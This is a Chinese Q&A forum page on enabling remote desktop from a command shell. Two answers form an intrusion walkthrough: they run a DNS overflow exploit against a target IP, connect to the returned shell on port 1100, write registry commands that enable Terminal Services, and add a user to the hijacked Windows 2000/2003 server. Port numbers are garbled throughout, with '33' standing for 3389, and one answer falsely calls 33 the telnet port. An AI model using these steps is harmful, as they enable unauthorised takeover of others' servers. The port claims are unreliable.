怎么样在cmd中开启33端口和远程服务?

发布网友 发布时间:2022-04-23 12:42

我来回答

5个回答

热心网友 时间:2023-09-03 16:19

相对于2000的系统来说,2003cmdshell下开启远程桌面服务就比较容易一些了,起码无需重启嘛!第一种方法也是用"echo"命令写入一个 33.reg文件,再"regedit /s 33.reg"导入注册表文件即可开启,比较简单,与上面介绍的2000的开启方法类似。将如下代码一行一行地复制到cmdshell窗口后按回车执行: echo Windows Registry Editor Version 5.00 >33.reg echo. >>33.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>33.reg echo "fDenyTSConnections"=dword:00000000 >>33.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>33.reg echo "PortNumber"=dword:00000d3d >>33.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>33.reg echo "PortNumber"=dword:00000d3d >>33.reg 完成以上操作后再执行"regedit /s 33.reg"导入即可生效!不过这个方法相对来说比较麻烦,也比较复杂一些。我们还可以用另外一种比较简单的方法来开启远程桌面服务的,嘿嘿。在介绍另一个操作方法之前,我们先来熟悉下2003系统下远程桌面服务的一个最关键的注册表键值。在"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"下数值名称为"fDenyTSConnections"的这一项,可以看到它的数值数据为1或0。数值为1的时候关闭远程桌面服务,数值为0的时候开启远程桌面服务。换句话说,我们只要可以在cmdshell下更改这个关键的注册表键值数据就可以达到实现开启远程桌面服务的目的了!有幸的是,在2003下有一个"reg"命令完全可以做到这一点,嘿嘿。这里我们找一台操作系统为2003的服务器,通过和上面介绍的同样方法溢出后返回一个cmdshell,如图5。当我们尝试连接的时候会发现根本无法连接上去,如图6。下面详细说明一下用"reg"命令开启远程桌面服务。执行:reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" 我们发现"fDenyTSConnections"键值数据为"0x1",如图7。这个是十六进制数的1。上面提到,数据为1则没有开启远程桌面服务。我们要做的就是把"0x1"改成"0x0"!直接用"reg add"是不行的,必须把原来键值删掉再添加!在cmdshell下执行: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 会询问是否"要删除注册表值 fDenyTSConnections 吗",当然Yes了,如图8。再执行: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0提示操作成功完成,如图9。这样就把"fDenyTSConnections"的值改为"0x0"了,我们可以执行: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"我们可以查看一下,看看是不是真的改掉了,发现已经成功更改了数据,如图10。现在再来连接服务器的33看看,发现已经可以成功连接上了,加个用户进去参观咯,如图11。至此2003下cmdshell开启远程桌面服务的方法也介绍完了。

热心网友 时间:2023-09-03 16:19

在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows 2000!接着我们进行溢出攻击,执行"dns -t 2000all IP 1207"后提示要我们检测返回的1100端口的shell。"telnet IP 1100"成功得到返回的cmdshell,如图3。注意目录为c:\WINNT\system32,顶部也明显可以看到Windows 2000相关字样。接着我们需要做的是使用"echo"命令写入一个33.reg注册表文件。将如下代码一行一行地复制到cmdshell窗口后按回车执行:
echo Windows Registry Editor Version 5.00 >33.reg
echo. >>33.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>33.reg
echo "Enabled"="0" >>33.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>33.reg
echo "ShutdownWithoutLogon"="0" >>33.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>33.reg
echo "EnableAdminTSRemote"=dword:00000001 >>33.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>33.reg
echo "TSEnabled"=dword:00000001 >>33.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>33.reg
echo "Start"=dword:00000002 >>33.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>33.reg
echo "Start"=dword:00000002 >>33.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>33.reg
echo "Hotkey"="1" >>33.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>33.reg
echo "PortNumber"=dword:00000D3D >>33.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>33.reg
echo "PortNumber"=dword:00000D3D >>33.reg

热心网友 时间:2023-09-03 16:20

net start termservice

热心网友 时间:2023-09-03 16:20

33就是远程访问telnet命令的端口.
通过netstat -an查找telnet是否已经开启;
net start telnet
如果你这项服务已经是禁用的,可能不行啊.
除非是停用才可以.

热心网友 时间:2023-09-03 16:21

恩 就是 这样!

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com